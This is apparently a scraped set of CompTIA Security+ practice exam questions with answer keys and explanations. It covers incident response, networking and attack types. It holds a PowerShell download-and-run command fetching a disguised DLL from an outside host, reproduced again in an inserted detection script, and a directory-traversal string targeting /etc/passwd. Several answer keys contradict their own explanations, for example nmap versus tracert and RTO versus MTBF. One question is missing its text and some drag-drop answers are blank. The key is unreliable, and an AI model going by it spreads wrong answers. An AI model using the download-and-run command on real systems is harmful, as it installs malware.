and establishment of a chain of custody be performed before?
A. Containment
B. Identification
C. Preparation
D. Recovery
Answer: A
Explanation:
Containment is the phase where the incident response team tries to isolate and stop the spread of the
incident. Before containing the incident, the team should collect and preserve any evidence that may
be useful for analysis and investigation. This includes documenting the incident details, such as date,
time, location, source, and impact. It also includes establishing a chain of custody, which is a record of
who handled the evidence, when, where, how, and why. A chain of custody ensures the integrity and
admissibility of the evidence in court or other legal proceedings.
228.A cybersecurity analyst at Company A is working to establish a secure communication channel with
a counterpart at Company B, which is 3,000 miles (4.828 kilometers) away.
Which of the following concepts would help the analyst meet this goal in a secure manner?
A. Digital signatures
B. Key exchange
C. Salting
D. PPTP
Answer: B
Explanation:
Key exchange is the process of securely sharing cryptographic keys between two parties over a public
network. This allows them to establish a secure communication channel and encrypt their messages.
There are different methods of key exchange, such as Diffie-Hellman or RSA.
References:
https://www.comptia.org/content/guides/what-is-encryption
229.Which of the following would provide guidelines on how to label new network devices as part of the
initial configuration?
A. IP schema
B. Application baseline configuration
C. Standard naming convention policy
D. Wireless LAN and network perimeter diagram
Answer: C
Explanation:
A standard naming convention policy would provide guidelines on how to label new network devices as
part of the initial configuration. A standard naming convention policy is a document that defines the rules
and formats for naming network devices, such as routers, switches, firewalls, servers, or printers. A
standard naming convention policy can help an organization achieve consistency, clarity, and efficiency
in network management and administration.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Network_Virtualization/PathIsolationDesignGuide/PathIsolationDesignGuide.pdf
230.A security administrator needs to provide secure access to internal networks for external partners.
The administrator has given the PSK and other parameters to the third-party security administrator.
Which of the following is being used to establish this connection?
A. Kerberos
B. SSL/TLS
C. IPSec
D. SSH
Answer: C
Explanation:
IPSec is a protocol suite that provides secure communication over IP networks. It uses encryption,
authentication, and integrity mechanisms to protect data from unauthorized access or modification.
IPSec can operate in two modes: transport mode and tunnel mode. In tunnel mode, IPSec can create a
virtual private network (VPN) between two endpoints, such as external partners and internal networks. To
establish a VPN connection, IPSec requires a pre-shared key (PSK) or other parameters to negotiate the
security association.
References: https://www.comptia.org/content/guides/what-is-vpn
Answer: A
Explanation:
Memory management is a technique that can allocate and deallocate memory for applications and
processes. Memory management can reduce vulnerabilities by avoiding code reuse, which is a
technique that exploits a memory corruption vulnerability to execute malicious code that already exists in
memory. Memory management can prevent code reuse by implementing features such as address
space layout randomization (ASLR), data execution prevention (DEP), or stack canaries.
232.Physical access to the organization's servers in the data center requires entry and exit through
multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself
and eventually to a caged area solely for the organization's hardware.
Which of the following controls is described in this scenario?
A. Compensating
B. Deterrent
C. Preventive
D. Detective
Answer: C
Explanation:
The scenario describes preventive controls, which are designed to stop malicious actors from gaining
access to the organization's servers. This includes using multiple access points, such as a lobby, an
access control vestibule, and multiple doors leading to the server floor, as well as caging the
organization's hardware. According to the CompTIA Security+ SY0-601 document, preventive controls
are "designed to stop malicious actors from performing a malicious activity or gaining access to an
asset." These controls can include technical solutions, such as authentication and access control
systems, physical security solutions, such as locks and barriers, and administrative solutions such as
policy enforcement.
233.Which of the following can be used to calculate the total loss expected per year due to a threat
targeting an asset?
A. EF x asset value
B. ALE / SLE
C. MTBF x impact
D. SLE x ARO
Answer: D
Explanation:
The total loss expected per year due to a threat targeting an asset can be calculated using the Single
Loss Expectancy (SLE) multiplied by the Annualized Rate of Occurrence (ARO). SLE is the monetary
loss expected from a single event, while ARO is the estimated frequency of that event occurring in a
year.
Reference: CompTIA Security+ Study Guide: Exam SY0-501, 7th Edition, by Emmett Dulaney and
Chuck Easttom, Chapter 9: Risk Management, page 414.
234.DRAG DROP
Leveraging the information supplied below, complete the CSR for the server to set up TLS (HTTPS)
• Hostname: ws01
• Domain: comptia.org
• IPv4: 10.1.9.50
• IPV4: 10.2.10.50
• Root: home.aspx
• DNS CNAME:homesite.
Instructions:
Drag the various data points to the correct locations within the CSR. Extension criteria belong in the left-hand
column and values belong in the corresponding row in the right-hand column.
Answer:
235.A security operations center wants to implement a solution that can execute files to test for malicious
activity. The solution should provide a report of the files' activity against known threats.
Which of the following should the security operations center implement?
A. the Harvester
B. Nessus
C. Cuckoo
D. Sn1per
Answer: C
Explanation:
Cuckoo is a sandbox that is specifically written to run programs inside and identify any malware. A
sandbox is a virtualized environment that isolates the program from the rest of the system and monitors
its behavior. Cuckoo can analyze files of various types, such as executables, documents, URLs, and
more. Cuckoo can provide a report of the files’ activity against known threats, such as network traffic, file
operations, registry changes, API calls, and so on.
A security operations center can implement Cuckoo to execute files to test for malicious activity and
generate a report of the analysis. Cuckoo can help the security operations center to detect and prevent
malware infections, investigate incidents, and perform threat intelligence.
236.An IT manager is estimating the mobile device budget for the upcoming year. Over the last five
years, the number of devices that were replaced due to loss, damage, or theft steadily increased by
10%.
Which of the following would best describe the estimated number of devices to be replaced next year?
A. SLA
B. ARO
C. RPO
D. SLE
Answer: B
Explanation:
ARO stands for annualized rate of occurrence, which is a metric that estimates how often a threat event
will occur within a year. ARO can help an IT manager estimate the mobile device budget for the
upcoming year by multiplying the number of devices replaced in the previous year by the percentage
increase of replacement over the last five years. For example, if 100 devices were replaced in the
previous year and the replacement rate increased by 10% each year for the last five years, then the
estimated number of devices to be replaced next year is 100 x (1 + 0.1)^5 = 161.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.techopedia.com/definition/24866/annualized-rate-of-occurrence-aro
237.An engineer recently deployed a group of 100 web servers in a cloud environment. Per the security
policy, all web-server ports except 443 should be disabled.
Which of the following can be used to accomplish this task?
A. Application allow list
B. Load balancer
C. Host-based firewall
D. VPN
Answer: C
Explanation:
A host-based firewall is a software application that runs on each individual host and controls the
incoming and outgoing network traffic based on a set of rules. A host-based firewall can be used to block
or allow specific ports, protocols, IP addresses, or applications.
An engineer can use a host-based firewall to accomplish the task of disabling all web-server ports except
443 on a group of 100 web servers in a cloud environment. The engineer can configure the firewall rules
on each web server to allow only HTTPS traffic on port 443 and deny any other traffic. Alternatively, the
engineer can use a centralized management tool to deploy and enforce the firewall rules across all web
servers.
238.Users report access to an application from an internal workstation is still unavailable to a specific
server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is
successful between the two devices.
Which of the following tools should the security analyst use to help identify if the traffic is being blocked?
A. nmap
B. tracert
C. ping
D. ssh
Answer: A
Explanation:
Tracert is a command-line tool that shows the route that packets take to reach a destination on a
network. It also displays the time it takes for each hop along the way. By using tracert, you can see if
there is a router or firewall that is blocking or slowing down the traffic between the internal workstation
and the specific server.
239.While researching a data exfiltration event, the security team discovers that a large amount of data
was transferred to a file storage site on the internet.
Which of the following controls would work best to reduce the risk of further exfiltration using this
method?
A. Data loss prevention
B. Blocking IP traffic at the firewall
C. Containerization
D. File integrity monitoring
Answer: A
Explanation:
Data loss prevention (DLP) is a set of tools and processes that aim to prevent unauthorized access, use,
or transfer of sensitive data. DLP can help reduce the risk of further exfiltration using file storage sites on
the internet by monitoring and controlling data flows across endpoints, networks, and cloud services.
DLP can also detect and block attempts to copy, upload, or download sensitive data to or from file
storage sites based on predefined
policies and rules.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.microsoft.com/en-us/security/business/security-101/what-is-data-loss-prevention-dlp
240.A company is moving its retail website to a public cloud provider. The company wants to tokenize
credit card data but not allow the cloud provider to see the stored credit card information.
Which of the following would BEST meet these objectives?
A. WAF
B. CASB
C. VPN
D. TLS
Answer: B
Explanation:
CASB stands for cloud access security broker, which is a software tool or service that acts as an
intermediary between users and cloud service providers. CASB can help protect data stored in cloud
services by enforcing security policies and controls such as encryption, tokenization, authentication,
authorization, logging, auditing, and threat detection. Tokenization is a process that replaces sensitive
data with non-sensitive substitutes called tokens that have no intrinsic value. Tokenization can help
prevent data leakage by ensuring that only authorized users can access the original data using a
tokenization system.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/products/security/what
241.A security engineer learns that a non-critical application was compromised. The most recent version
of the application includes a malicious reverse proxy while the application is running.
Which of the following should the engineer do to quickly contain the incident with the least amount of
impact?
A. Configure firewall rules to block malicious inbound access.
B. Manually uninstall the update that contains the backdoor.
C. Add the application hash to the organization's blocklist.
D. Turn off all computers that have the application installed.
Answer: C
Explanation:
A reverse proxy backdoor is a malicious reverse proxy that can intercept and manipulate the traffic
between the client and the web server. This can allow an attacker to access sensitive data or execute
commands on the web server.
One possible way to quickly contain the incident with the least amount of impact is to add the application
hash to the organization’s blocklist. A blocklist is a list of applications or files that are not allowed to run
on a system or network. By adding the application hash to the blocklist, the security engineer can
prevent the malicious application from running and communicating with the reverse proxy backdoor.
242.An organization is concerned about hackers potentially entering a facility and plugging in a remotely
accessible Kali Linux box.
Which of the following should be the first lines of defense against such an attack? (Select TWO).
A. MAC filtering
B. Zero trust segmentation
C. Network access control
D. Access control vestibules
E. Guards
F. Bollards.
Answer: A,C
Explanation:
MAC filtering is a method of allowing or denying access to a network based on the MAC address of the
device attempting to connect. By creating a list of approved MAC addresses, the organization can
prevent unauthorized devices from connecting to the network.
Network Access Control (NAC) is a security solution that allows organizations to restrict access to their
networks based on the device's identity, configuration, and security posture.
This can be used to ensure that only legitimate devices are allowed to connect to the network, and any
unauthorized devices are blocked.
243.Which of the following should customers who are involved with Ul developer agreements be
concerned with when considering the use of these products on highly sensitive projects?
A. Weak configurations
B. Integration activities
C. Unsecure user accounts
D. Outsourced code development
Answer: A
Explanation:
Customers who are involved with Ul developer agreements should be concerned with weak
configurations when considering the use of these products on highly sensitive projects. Weak
configurations can lead to security vulnerabilities, which can be exploited by malicious actors. It is
important to ensure that all configurations are secure and up-to-date in order to protect sensitive data.
Source: UL
244.A web server log contains two million lines. A security analyst wants to obtain the next 500 lines
starting from line 4,600.
Which of the following commands will help the security analyst to achieve this objective?
A. cat webserver.log | head -4600 | tail +500 |
B. cat webserver.log | tail -1995400 | tail -500 |
C. cat webserver.log | tail -4600 | head -500 |
D. cat webserver.log | head -5100 | tail -500 |
Answer: D
Explanation:
The cat command displays the contents of a file, the head command displays the first lines of a file, and
the tail command displays the last lines of a file. To display a specific number of lines from a file, you can
use a minus sign followed by a number as an option for head or tail. For example, head -10 will display
the first 10 lines of a file.
To obtain the next 500 lines starting from line 4,600, you need to use both head and tail commands.
https://www.professormesser.com/security-plus/sy0-601/sy0-601-video/file-manipulation-tools/
245.An attacker is targeting a company. The attacker notices that the company’s employees frequently
access a particular website. The attacker decides to infect the website with malware and hopes the
employees’ devices will also become infected.
Which of the following techniques is the attacker using?
A. Watering-hole attack
B. Pretexting
C. Typosquatting
D. Impersonation
Answer: A
Explanation:
A watering hole attack is a form of cyberattack that targets a specific group of users by infecting websites
that they commonly visit. The attacker seeks to compromise the user's computer and gain access to
the network at the user's workplace or personal data. The attacker observes the websites often
visited by the victim or the group and infects those sites with malware. The attacker may also lure the
user to a malicious site. A watering hole attack is difficult to diagnose and poses a significant threat to
websites and users.
246.A company is launching a website in a different country in order to capture user information
that a marketing business can use. The company itself will not be using the information.
Which of the following roles is the company assuming?
A. Data owner
B. Data processor
C. Data steward
D. Data collector
Answer: D
Explanation:
A data collector is a person or entity that collects personal data from individuals for a specific purpose. A
data collector may or may not be the same as the data controller or the data processor, depending on
who determines the purpose and means of processing the data and who actually processes the data.
247.Unauthorized devices have been detected on the internal network. The devices' locations were
traced to Ethernet ports located in conference rooms.
Which of the following would be the best technical controls to implement to prevent these devices from
accessing the internal network?
A. NAC
B. DLP
C. IDS
D. MFA
Answer: A
Explanation:
NAC stands for network access control, which is a security solution that enforces policies and controls
on devices that attempt to access a network. NAC can help prevent unauthorized devices from
accessing the internal network by verifying their identity, compliance, and security posture before
granting them access. NAC can also monitor and restrict the activities of authorized devices based on
predefined rules and roles. References: https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.cisco.com/c/en/us/products/security/what-is-network-access-control-nac.html
248.An organization's Chief Information Security Officer is creating a position that will be responsible for
implementing technical controls to protect data, including ensuring backups are properly maintained.
Which of the following roles would MOST likely include these responsibilities?
A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor
Answer: C
Explanation:
The role that would most likely include the responsibilities of implementing technical controls to protect
data and ensuring backups are properly maintained would be a Backup Administrator. A Backup
Administrator is responsible for maintaining and managing an organization's backup systems and
procedures, which includes ensuring that backups are properly configured, tested and securely stored.
They are also responsible for the recovery of data in case of a disaster or data loss.
249.A security administrator is seeking a solution to prevent unauthorized access to the internal network.
Which of the following security solutions should the administrator choose?
A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN
Answer: D
Explanation:
A VPN (virtual private network) is a secure tunnel used to encrypt traffic and prevent unauthorized
access to the internal network. It is a secure way to extend a private network across public networks,
such as the Internet, and can be used to allow remote users to securely access resources on the internal
network. Additionally, a VPN can be used to prevent malicious traffic from entering the internal network.
250.A security administrator is evaluating remote access solutions for employees who are geographically
dispersed.
Which of the following would provide the MOST secure remote access? (Select TWO).
A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN
Answer: A,F
Explanation:
IPSec (Internet Protocol Security) is a technology that provides secure communication over the internet
by encrypting traffic and authenticating it at both the sender and receiver. It can be used to create secure
tunnels between two or more devices, allowing users to access resources securely and privately.
SSL VPN (Secure Sockets Layer Virtual Private Network) is a type of VPN that uses an SSL/TLS
connection to encrypt traffic between two or more devices. It is a secure and reliable solution for
providing remote access, as all traffic is encrypted and authenticated. Additionally, SSL VPNs can also
be used to restrict access to certain websites and services, making them a secure and robust solution for
remote access.
251.A company has hired an assessment team to test the security of the corporate network and
employee vigilance. Only the Chief Executive Officer and Chief Operating Officer are aware
of this exercise, and very little information has been provided to the assessors.
Which of the following is taking place?
A. A red-team test
B. A white-team test
C. A purple-team test
D. A blue-team test
Answer: A
Explanation:
A red-team test is a type of security assessment that simulates a real-world attack on an organization’s
network, systems, applications, and people. The goal of a red-team test is to evaluate the organization’s
security posture, identify vulnerabilities and gaps, and test the effectiveness of its detection and
response capabilities. A red-team test is usually performed by a group of highly skilled security
professionals who act as adversaries and use various tools and techniques to breach the organization’s
defenses. A red-team test is often conducted without the knowledge or consent of most of the
organization’s staff, except for a few senior executives who authorize and oversee the exercise.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://cybersecurity.att.com/blogs/security-essentials/what-is-red-teaming
252.Audit logs indicate an administrative account that belongs to a security engineer has been locked
out multiple times during the day. The security engineer has been on vacation for a few days.
Which of the following attacks can the account lockout be attributed to?
A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan
Answer: B
Explanation:
The account lockout can be attributed to a brute-force attack. A brute-force attack is a type of attack
where an attacker attempts to guess a user's password by continually trying different combinations of
characters. In this case, it is likely that the security engineer's account was locked out due to an attacker
attempting to guess their password. Backdoor, rootkit, and Trojan attacks are not relevant in this
scenario.
253.A junior human resources administrator was gathering data about employees to submit to a new
company awards program. The employee data included job title, business phone number, location, first
initial with last name, and race.
Which of the following best describes this type of information?
A. Sensitive
B. Non-PII
C. Private
D. Confidential
Answer: B
Explanation:
Non-PII stands for non-personally identifiable information, which is any data that does not directly identify
a specific individual. Non-PII can include information such as job title, business phone number, location,
first initial with last name, and race. Non-PII can be used for various purposes, such as statistical
254.The findings in a consultant's report indicate the most critical risk to the security posture from an
incident response perspective is a lack of workstation and server investigation capabilities.
Which of the following should be implemented to remediate this risk?
A. HIDS
B. FDE
C. NGFW
D. EDR
Answer: D
Explanation:
EDR solutions are designed to detect and respond to malicious activity on workstations and servers, and
they provide a detailed analysis of the incident, allowing organizations to quickly remediate the threat.
According to the CompTIA Security+ SY0-601 Official Text Book, EDR solutions can be used to detect
malicious activity on endpoints, investigate the incident, and contain the threat. EDR solutions can also
provide real-time monitoring and alerting for potential security events, as well as detailed forensic
analysis for security incidents. Additionally, the text book recommends that organizations also implement
a host-based intrusion detection system (HIDS) to alert them to malicious activity on their workstations
and servers.
255.DRAG DROP
A data owner has been tasked with assigning proper data classifications and destruction methods for
various types of data contained within the environment.
Answer:
Explanation:
256.A security team will be outsourcing several key functions to a third party and will require that:
• Several of the functions will carry an audit burden.
• Attestations will be performed several times a year.
• Reports will be generated on a monthly basis.
Which of the following BEST describes the document that is used to define these requirements and
stipulate how and when they are performed by the third party?
A. MOU
B. AUP
C. SLA
D. MSA
Answer: C
Explanation:
A service level agreement (SLA) is a contract between a service provider and a customer that outlines
the services that are to be provided and the expected levels of performance. It is used to define the
requirements for the service, including any attestations and reports that must be generated, and the
timescales in which these must be completed. It also outlines any penalties for failing to meet these
requirements. SLAs are essential for ensuring that third-party services are meeting the agreed upon
performance levels.
Reference: CompTIA Security+ Study Guide: SY0-601 by Emmett Dulaney, Chuck Easttom
https://www.wiley.com/en-us/CompTIA+Security%2B+Study+Guide%3A+SY0-601-p-9781119515968
CompTIA Security+ Get Certified Get Ahead: SY0-601 Study Guide by Darril Gibson
https://www.amazon.com/CompTIA-Security-Certified-Ahead-SY0-601/dp/1260117558
Note: SLA is the best document that is used to define these requirements and stipulate how and when
they are performed by the third party.
257.A security analyst reviews web server logs and finds the following string:
gallerys?file=../../../../../../etc/passwd
Which of the following attacks was performed against the web server?
A. Directory traversal
B. CSRF
C. Pass the hash
D. SQL injection
Answer: A
Explanation:
Directory traversal is an attack that exploits a vulnerability in a web application or a file system to access
files or directories that are outside the intended scope. The attacker can use special characters, such
as ../ or ..\ , to navigate through the directory structure and access restricted files or directories.
258.An employee received an email with an unusual file attachment named Updates.lnk. A security
analyst reverse engineers what the file does and finds that it executes the following script:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg
-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll
Which of the following BEST describes what the analyst found?
A. A Powershell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.
Answer: A
Explanation:
According to GitHub user JSGetty196's notes, a PowerShell code that uses rundll32.exe to execute a
DLL file is performing a DLL injection attack. This is a type of code injection attack that exploits the
Windows process loading mechanism.
https://www.comptia.org/training/books/security-sy0-601-study-guide
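As an added example (not part of the original question set), the detection logic below scans constructed Sysmon-style process-creation records for the pattern in the script above: PowerShell fetching a remote "image" into a temp directory under a .dll name and then handing that file to rundll32.exe. The log format and the benign lines are assumptions; the third record carries the command line from the question.

```python
import re
from dataclasses import dataclass, field

# Constructed Sysmon-style process-creation records (not real telemetry).
# Record 3 contains the command line from the question as given.
SAMPLE_LOG = [
    r"EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine=cmd.exe /c whoami",
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=powershell.exe -Command Invoke-WebRequest -Uri https://intranet.example/logo.png "
    r"-OutFile C:\Users\alice\Pictures\logo.png",
    r"EventID=1 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "
    r"CommandLine=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg "
    r"-OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll",
    r"EventID=1 Image=C:\Windows\System32\rundll32.exe CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
]

URL_RE = re.compile(r"https?://[^\s;]+", re.IGNORECASE)
OUTFILE_RE = re.compile(r"-OutFile\s+([^\s;]+)", re.IGNORECASE)
RUNDLL_RE = re.compile(r"rundll32(?:\.exe)?\s+([^\s;,]+)", re.IGNORECASE)
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
TEMP_MARKERS = ("$env:temp", "$env:tmp", "\\temp\\", "\\appdata\\local\\temp")


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: list = field(default_factory=list)


def analyze_command_line(cmd: str) -> list:
    """Return the reasons this PowerShell command line matches the
    'download DLL disguised as an image, execute via rundll32' pattern.
    An empty list means nothing suspicious was seen."""
    reasons = []
    if "powershell" not in cmd.lower():
        return reasons
    url = URL_RE.search(cmd)
    outfile = OUTFILE_RE.search(cmd)
    rundll = RUNDLL_RE.search(cmd)
    out_path = outfile.group(1).lower() if outfile else ""
    if url and outfile:
        # Extension mismatch: served as an image, saved as a DLL
        if url.group(0).lower().endswith(IMAGE_EXTS) and out_path.endswith(".dll"):
            reasons.append("remote 'image' saved with a .dll extension")
        if any(marker in out_path for marker in TEMP_MARKERS):
            reasons.append("payload written to a temp directory")
    if rundll:
        target = rundll.group(1).lower()
        if out_path and target == out_path:
            reasons.append("rundll32 executes the file just downloaded")
        elif target.endswith(".dll") and any(m in target for m in TEMP_MARKERS):
            reasons.append("rundll32 loads a DLL from a temp directory")
    return reasons


def scan_log(lines) -> list:
    """Run analyze_command_line over every record that carries a CommandLine
    field and collect the ones with at least one reason."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = re.search(r"CommandLine=(.*)$", line)
        if not match:
            continue
        reasons = analyze_command_line(match.group(1))
        if reasons:
            findings.append(Finding(line_no, match.group(1), reasons))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"record {finding.line_no}: {'; '.join(finding.reasons)}")
```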
259.A company completed a vulnerability scan. The scan found malware on several systems that were
running older versions of Windows.
Which of the following is MOST likely the cause of the malware infection?
A. Open permissions
B. Improper or weak patch management
C. Unsecure root accounts
D. Default settings
Answer: B
Explanation:
The reason for this is that older versions of Windows may have known vulnerabilities that have been
patched in more recent versions. If a company is not regularly patching their systems, they are leaving
those vulnerabilities open to exploit, which can allow malware to infect the systems.
It is important to regularly update and patch systems to address known vulnerabilities and protect
against potential malware infections. This is an important aspect of proper security management.
Here is a reference to the CompTIA Security+ certification guide which states that "Properly configuring
and maintaining software, including patch management, is critical to protecting systems and data."
Reference: CompTIA Security+ Study Guide: SY0-601 by Emmett Dulaney, Chuck Easttom
https://www.wiley.com/en-us/CompTIA+Security%2B+Study+Guide%3A+SY0-601-p-9781119515968
260.A security practitioner is performing due diligence on a vendor that is being considered for cloud
services.
Which of the following should the practitioner consult for the best insight into the
current security posture of the vendor?
A. PCI DSS standards
B. SLA contract
C. CSF framework
D. SOC 2 report
Answer: D
Explanation:
A SOC 2 report is a document that provides an independent assessment of a service organization's
controls related to the Trust Services Criteria of Security, Availability, Processing Integrity, Confidentiality,
or Privacy. A SOC 2 report can help a security practitioner evaluate the current security posture of a
vendor that provides cloud services.
261.A security administrator is managing administrative access to sensitive systems with the following
requirements:
• Common login accounts must not be used for administrative duties.
• Administrative accounts must be temporal in nature.
• Each administrative account must be assigned to one specific user.
• Accounts must have complex passwords.
• Audit trails and logging must be enabled on all systems.
Which of the following solutions should the administrator deploy to meet these requirements?
A. ABAC
B. SAML
C. PAM
D. CASB
Answer: C
Explanation:
PAM is a solution that enables organizations to securely manage users' accounts and access to
sensitive systems. It allows administrators to create unique and complex passwords for each user, as
well as assign each account to a single user for administrative duties. PAM also provides audit trails and
logging capabilities, allowing administrators to monitor user activity and ensure that all systems are
secure. According to the CompTIA Security+ SY0-601 Course Book, “PAM is the most comprehensive
way to control and monitor privileged accounts”.
262.HOTSPOT
An incident has occurred in the production environment.
Analyze the command outputs and identify the type of compromise.
Answer:
Explanation:
Command Output1 = Logic Bomb
A logic bomb is a type of malicious code that executes when certain conditions are met, such as a
specific date or time, or a specific user action. In this case, the logic bomb is a script that runs every
minute and checks if there is a user named john in the /etc/password file. If there is, it drops the
production database using a MySQL command. This could cause severe damage to the system and
the data.
To prevent logic bombs, you should use antivirus software that can detect and remove malicious code,
and also perform regular backups of your data. You should also avoid opening suspicious attachments or
links from unknown sources, and use strong passwords for your accounts.
Command Output2 = Backdoor
A backdoor is a type of malicious code that allows an attacker to access a system or network remotely,
bypassing security measures. In this case, the backdoor is a script that runs every time the date
command is executed and prompts the user to enter their full name. Then, it opens a reverse shell
connection using the nc command and downloads a virus file from a malicious website using the wget
command. This could allow the attacker to execute commands on the system and infect it with malware.
To prevent backdoors, you should use antivirus software that can detect and remove malicious code,
and also update your system and applications regularly. You should also avoid executing unknown
commands or scripts from untrusted sources, and use firewall rules to block unauthorized connections.
263.A security team suspects that the cause of recent power consumption overloads is the unauthorized
use of empty power outlets in the network rack.
Which of the following options will mitigate this issue without compromising the number of outlets
available?
A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity
Answer: B
Explanation:
Installing a managed PDU is the most appropriate option to mitigate the issue without compromising the
number of outlets available. A managed Power Distribution Unit (PDU) helps monitor, manage, and
control power consumption at the rack level. By installing a managed PDU, the security team will have
greater visibility into power usage in the network rack, and they can identify and eliminate unauthorized
devices that consume excessive power from empty outlets.
https://www.comptia.org/training/books/security-sy0-601-study-guide
264.A candidate attempts to go to but accidentally visits http://comptiia.org. The malicious website looks
exactly like the legitimate website.
Which of the following best describes this type of attack?
A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole
Answer: C
Explanation:
Typosquatting is a type of cyberattack that involves registering domains with deliberately misspelled
names of well-known websites. The attackers do this to lure unsuspecting visitors to alternative websites,
typically for malicious purposes. Visitors may end up at these alternative websites by inadvertently
mistyping the name of popular websites into their web browser or by being lured by a phishing scam.
The attackers may emulate the look and feel of the legitimate websites and trick users into entering
sensitive information or downloading malware.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.kaspersky.com/resource-center/definitions/what-is-typosquatting
265.A new security engineer has started hardening systems. One of the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to
use SCP to transfer files to the NAS, even though the data is still viewable from the users' PCs.
Which of the following is the MOST likely cause of this issue?
A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
266.A company needs to enhance its ability to maintain a scalable cloud infrastructure. The
infrastructure needs to handle the unpredictable loads on the company's web application.
Which of the following cloud concepts would BEST meet these requirements?
A. SaaS
B. VDI
C. Containers
D. Microservices
Answer: C
Explanation:
Containers are a type of virtualization technology that allow applications to run in a secure, isolated
environment on a single host. They can be quickly scaled up or down as needed, making them an ideal
solution for unpredictable loads. Additionally, containers are designed to be lightweight and portable, so
they can easily be moved from one host to another.
Reference: CompTIA Security+ SY0-601 Official Textbook, page 863.
267.Stakeholders at an organisation must be kept aware of any incidents and receive updates on status
changes as they occur.
Which of the following Plans would fulfill this requirement?
A. Communication plan
B. Disaster recovery plan
C. Business continuity plan
D. Risk plan
Answer: A
Explanation:
A communication plan is a plan that would fulfill the requirement of keeping stakeholders at an
organization aware of any incidents and receiving updates on status changes as they occur. A
communication plan is a document that outlines the communication objectives, strategies, methods,
channels, frequency, and audience for an incident response process. A communication plan can help an
organization communicate effectively and efficiently with internal and external stakeholders during an
incident and keep them informed of the incident’s impact, progress, resolution, and recovery.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.ready.gov/business-continuity-plan
268.Which of the following security design features can a development team use to analyze the deletion
or editing of data sets without affecting the original copy?
A. Stored procedures
B. Code reuse
C. Version control
D. Continuous
Answer: C
Explanation:
Version control is a solution that can help a development team to analyze the deletion or editing of data
sets without affecting the original copy. Version control is a system that records changes to a file or set of
files over time so that specific versions can be recalled later. Version control can help developers track
and manage changes to code, data, or documents, as well as collaborate with other developers and
resolve conflicts.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://www.atlassian.com/git/tutorials/what-is-version-control
269.Which of the following measures the average time that equipment will operate before it breaks?
A. SLE
B. MTBF
C. RTO
D. ARO
Answer: C
Explanation:
The measure that calculates the average time that equipment will operate before it breaks is MTBF.
MTBF stands for Mean Time Between Failures and it is a metric that represents the average time
between two failures occurring in a given period. MTBF is used to measure the reliability and
availability of a product or system. The higher the MTBF, the more reliable and available the product or
system is.
270.A network architect wants a server to have the ability to retain network availability even if one of the
network switches it is connected to goes down.
Which of the following should the architect implement on the server to achieve this goal?
A. RAID
B. UPS
C. NIC teaming
D. Load balancing
Answer: C
Explanation:
NIC Teaming is a feature that allows a server to be connected to multiple network switches, providing
redundancy and increased network availability. If one of the switches goes down, the server will still be
able to send and receive data through one of the other switches. To configure NIC Teaming in Windows
Server, see Microsoft's documentation: https://docs.microsoft.com/en-us/windows-
271.A network administrator needs to determine the sequence of a server farm's logs.
Which of the following should the administrator consider? (Select TWO).
A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset
Answer: D,F
Explanation:
A server farm’s logs are records of events that occur on a group of servers that provide the same service
or function. Logs can contain information such as date, time, source, destination, message, error code,
and severity level. Logs can help administrators monitor the performance, security, and availability of the
servers and troubleshoot any issues.
To determine the sequence of a server farm’s logs, the administrator should consider the following
factors:
✑ Time stamps: Time stamps are indicators of when an event occurred on a server. Time stamps can
help administrators sort and correlate events across different servers based on chronological order.
However, time stamps alone may not be sufficient to determine the sequence of events if the servers
have different time zones or clock settings.
✑ Time offset: Time offset is the difference between the local time of a server and a reference time, such
as Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT). Time offset can help
administrators adjust and synchronize the time stamps of different servers to a common reference time
and eliminate any discrepancies caused by time zones or clock settings.
